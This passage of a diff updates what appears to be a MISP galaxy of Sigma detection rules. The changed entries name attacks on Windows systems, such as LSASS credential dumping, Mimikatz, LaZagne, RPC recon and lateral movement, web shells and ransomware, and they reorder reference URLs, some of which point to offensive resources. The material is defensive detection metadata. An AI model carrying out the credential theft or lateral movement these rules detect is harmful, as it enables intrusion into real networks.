"https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", - "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", - "https://github.com/tennc/webshell", - "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_webshell.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "fdf135a2-9241-4f96-a114-bb404948f736", - "value": "Antivirus Web Shell Detection" - }, - { - "description": "Detects a highly relevant Antivirus alert that reports ransomware", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/12", - "falsepositive": [ - "Unlikely" - ], - "filename": "av_ransomware.yml", - "level": "critical", - "logsource.category": "antivirus", - "logsource.product": "No established product", - "refs": [ - "https://www.nextron-systems.com/?s=antivirus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/antivirus/av_ransomware.yml" - ], - "tags": [ - "attack.t1486" - ] - }, - "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", - "value": "Antivirus Ransomware Detection" - }, - { - "description": "Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields", - "meta": { - "author": "@juju4", - "creation_date": "2022/12/27", - "falsepositive": [ - "Inventory and monitoring activity", - "Vulnerability scanners", - "Legitimate applications" - ], - "filename": "db_anomalous_query.yml", - "level": "medium", - "logsource.category": "database", - "logsource.product": "No established product", - "refs": [ - "https://github.com/sqlmapproject/sqlmap", - "https://github.com/SigmaHQ/sigma/tree/master/rules/application/database/db_anomalous_query.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.initial_access", - "attack.privilege_escalation", - "attack.t1190", - "attack.t1505.001" - ] - }, - "uuid": "d84c0ded-edd7-4123-80ed-348bb3ccc4d5", - "value": "Suspicious SQL Query" - }, { "description": "Detects suspicious Spring framework exceptions that could indicate exploitation attempts", "meta": { @@ -1588,6 +2057,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ae48ab93-45f7-4051-9dfe-5d30a3f78e33", "value": "Spring Framework Exceptions" }, @@ -1612,6 +2090,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "19aefed0-ffd4-47dc-a7fc-f8b1425e84f9", "value": "Python SQL Exceptions" }, @@ -1636,6 +2123,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8a670c6d-7189-4b1c-8017-a417ca84a086", "value": "Suspicious SQL Error Messages" }, @@ -1653,9 +2149,9 @@ "logsource.product": "ruby_on_rails", "refs": [ "http://guides.rubyonrails.org/action_controller_overview.html", + "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", "http://edgeguides.rubyonrails.org/security.html", "https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb", - "https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" ], "tags": [ @@ -1663,6 +2159,15 @@ "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", "value": "Ruby on Rails Framework Exceptions" }, @@ -1679,15 +2184,15 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://attack.mitre.org/techniques/T1087/", - "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml" ], "tags": [ - "attack.t1087" + "attack.t1087", + "attack.discovery" ] }, "uuid": "65f77b1e-8e79-45bf-bb67-5988a8ce45a5", @@ -1706,14 +2211,15 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://attack.mitre.org/tactics/TA0007/", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml" ], - "tags": "No established tags" + "tags": [ + "attack.discovery" + ] }, "uuid": "d8ffe17e-04be-4886-beb9-c1dd1944b9a8", "value": "Remote Registry Recon" @@ -1731,14 +2237,15 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml" ], - "tags": "No established tags" + "tags": [ + "attack.discovery" + ] }, "uuid": "7f7c49eb-2977-4ac8-8ab0-ab1bae14730e", "value": "Remote Schedule Task Recon via ITaskSchedulerService" @@ -1756,12 +2263,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://attack.mitre.org/tactics/TA0008/", - "https://attack.mitre.org/techniques/T1569/002/", - "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml" ], "tags": [ @@ -1769,6 +2274,15 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "10018e73-06ec-46ec-8107-9172f1e04ff2", "value": "Remote Server Service Abuse for Lateral Movement" }, @@ -1785,12 +2299,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://attack.mitre.org/techniques/T1053/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml" ], "tags": [ @@ -1799,6 +2311,15 @@ "attack.t1053.002" ] }, + "related": [ + { + "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0fcd1c79-4eeb-4746-aba9-1b458f7a79cb", "value": "Remote Schedule Task Lateral Movement via ATSvc" }, @@ -1815,15 +2336,15 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://attack.mitre.org/techniques/T1033/", - "https://github.com/zeronetworks/rpcfirewall", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml" ], "tags": [ - "attack.t1033" + "attack.t1033", + "attack.discovery" ] }, "uuid": "56fda488-113e-4ce9-8076-afc2457922c3", @@ -1842,12 +2363,13 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/zeronetworks/rpcfirewall", - "https://attack.mitre.org/tactics/TA0007/", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml" ], - "tags": "No established tags" + "tags": [ + "attack.discovery" + ] }, "uuid": "2053961f-44c7-4a64-b62d-f6e72800af0d", "value": "Remote Event Log Recon" @@ -1865,12 +2387,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://attack.mitre.org/techniques/T1053/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml" ], "tags": [ @@ -1879,6 +2399,15 @@ "attack.t1053.002" ] }, + "related": [ + { + "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d", "value": "Remote Schedule Task Lateral Movement via ITaskSchedulerService" }, @@ -1895,12 +2424,9 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://attack.mitre.org/tactics/TA0008/", - "https://github.com/zeronetworks/rpcfirewall", - "https://attack.mitre.org/techniques/T1021/003/", - "https://attack.mitre.org/techniques/T1047/", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml" ], "tags": [ @@ -1909,6 +2435,22 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "68050b10-e477-4377-a99b-3721b422d6ef", "value": "Remote DCOM/WMI Lateral Movement" }, @@ -1925,12 +2467,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://attack.mitre.org/tactics/TA0008/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://attack.mitre.org/techniques/T1053/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml" ], "tags": [ @@ -1939,6 +2479,15 @@ "attack.t1053.002" ] }, + "related": [ + { + "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aff229ab-f8cd-447b-b215-084d11e79eb0", "value": "Remote Schedule Task Lateral Movement via SASec" }, @@ -1955,13 +2504,12 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", - "https://attack.mitre.org/tactics/TA0008/", - "https://github.com/zeronetworks/rpcfirewall", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml" ], "tags": [ @@ -1984,11 +2532,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", - "https://attack.mitre.org/techniques/T1033/", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml" ], "tags": [ @@ -2011,11 +2558,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://attack.mitre.org/tactics/TA0008/", - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml" ], "tags": [ @@ -2038,14 +2584,15 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://attack.mitre.org/tactics/TA0007/", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", + "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml" ], - "tags": "No established tags" + "tags": [ + "attack.discovery" + ] }, "uuid": "0a3ff354-93fc-4273-8a03-1078782de5b7", "value": "Recon Activity via SASec" @@ -2063,16 +2610,15 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://attack.mitre.org/tactics/TA0008/", + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md", "https://github.com/zeronetworks/rpcfirewall", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", - "https://attack.mitre.org/techniques/T1112/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml" ], "tags": [ - "attack.lateral_movement" + "attack.lateral_movement", + "attack.t1112" ] }, "uuid": "35c55673-84ca-4e99-8d09-e334f3c29539", @@ -2091,11 +2637,10 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", - "https://attack.mitre.org/tactics/TA0008/", - "https://github.com/zeronetworks/rpcfirewall", "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9", + "https://github.com/zeronetworks/rpcfirewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" ], "tags": [ @@ -2118,14 +2663,15 @@ "logsource.category": "application", "logsource.product": "rpc_firewall", "refs": [ + "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md", - "https://attack.mitre.org/tactics/TA0007/", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931", "https://github.com/zeronetworks/rpcfirewall", - "https://zeronetworks.com/blog/stopping_lateral_movement_via_the_rpc_firewall/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml" ], - "tags": "No established tags" + "tags": [ + "attack.discovery" + ] }, "uuid": "f177f2bc-5f3e-4453-b599-57eefce9a59c", "value": "Remote Schedule Task Recon via AtScv" @@ -2151,6 +2697,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "value": "Potential Credential Dumping Attempt Via PowerShell" }, @@ -2167,10 +2722,10 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" ], @@ -2180,6 +2735,15 @@ "attack.s0002" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fa34b441-961a-42fa-a100-ecc28c886725", "value": "LSASS Access from Program in Suspicious Folder" }, @@ -2196,8 +2760,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://twitter.com/shantanukhande/status/1229348874298388484", "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://twitter.com/shantanukhande/status/1229348874298388484", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" ], "tags": [ @@ -2205,6 +2769,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a49fa4d5-11db-418c-8473-1e014a8dd462", "value": "Lsass Memory Dump via Comsvcs DLL" }, @@ -2234,6 +2807,22 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3b4b232a-af90-427c-a22f-30b0c0837b95", "value": "CMSTP Execution Process Access" }, @@ -2260,6 +2849,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fb3722e4-1a06-46b6-b772-253e2e7db933", "value": "Load Undocumented Autoelevated COM Interface" }, @@ -2284,6 +2882,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", "value": "Credential Dumping by Pypykatz" }, @@ -2300,8 +2907,8 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ - "https://twitter.com/timbmsft/status/900724491076214784", "https://github.com/hlldz/Invoke-Phant0m", + "https://twitter.com/timbmsft/status/900724491076214784", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml" ], "tags": [ @@ -2309,6 +2916,15 @@ "attack.t1562.002" ] }, + "related": [ + { + "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "value": "Suspect Svchost Memory Asccess" }, @@ -2325,9 +2941,9 @@ "logsource.category": "process_access", "logsource.product": "windows", "refs": [ + "https://twitter.com/mrd0x/status/1460597833917251595", "https://twitter.com/_xpn_/status/1491557187168178176", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", - "https://twitter.com/mrd0x/status/1460597833917251595", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml" ], "tags": [ @@ -2336,6 +2952,15 @@ "attack.s0002" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4be8b654-0c01-4c9d-a10c-6b28467fc651", "value": "LSASS Access from White-Listed Processes" }, @@ -2365,6 +2990,29 @@ "attack.s0002" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aa35a627-33fb-4d04-a165-d33b4afca3e8", "value": "Mimikatz through Windows Remote Management" }, @@ -2391,6 +3039,15 @@ "attack.s0002" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", "value": "WerFault Accassing LSASS" }, @@ -2441,6 +3098,15 @@ "attack.s0349" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", "value": "Credential Dumping by LaZagne" }, @@ -2463,6 +3129,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "174afcfa-6e40-4ae9-af64-496546389294", "value": 